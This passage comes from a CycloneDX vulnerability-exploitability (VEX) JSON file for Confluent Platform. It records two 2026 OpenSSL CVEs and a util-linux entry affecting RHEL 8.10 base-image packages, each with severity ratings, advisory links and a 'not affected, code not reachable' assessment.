          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-28387",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        416
      ],
      "description": "Issue summary: An uncommon configuration of clients performing DANE TLSA-based\nserver authentication, when paired with uncommon server DANE TLSA records, may\nresult in a use-after-free and/or double-free on the client side.\n\nImpact summary: A use after free can have a range of potential consequences\nsuch as the corruption of valid data, crashes or execution of arbitrary code.\n\nHowever, the issue only affects clients that make use of TLSA records with both\nthe PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate\nusage.\n\nBy far the most common deployment of DANE is in SMTP MTAs for which RFC7672\nrecommends that clients treat as 'unusable' any TLSA records that have the PKIX\ncertificate usages.  These SMTP (or other similar) clients are not vulnerable\nto this issue.  Conversely, any clients that support only the PKIX usages, and\nignore the DANE-TA(2) usage are also not vulnerable.\n\nThe client would also need to be communicating with a server that publishes a\nTLSA RRset with both types of TLSA records.\n\nNo FIPS modules are affected by this issue, the problem code is outside the\nFIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28387"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28387"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28387"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28387"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:20+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-28388",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: When a delta CRL that contains a Delta CRL Indicator extension\nis processed a NULL pointer dereference might happen if the required CRL\nNumber extension is missing.\n\nImpact summary: A NULL pointer dereference can trigger a crash which\nleads to a Denial of Service for an application.\n\nWhen CRL processing and delta CRL processing is enabled during X.509\ncertificate verification, the delta CRL processing does not check\nwhether the CRL Number extension is NULL before dereferencing it.\nWhen a malformed delta CRL file is being processed, this parameter\ncan be NULL, causing a NULL pointer dereference.\n\nExploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in\nthe verification context, the certificate being verified to contain a\nfreshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and\nan attacker to provide a malformed CRL to an application that processes it.\n\nThe vulnerability is limited to Denial of Service and cannot be escalated to\nachieve code execution or memory disclosure. For that reason the issue was\nassessed as Low severity according to our Security Policy.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28388"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28388"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28388"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28388"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:20+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
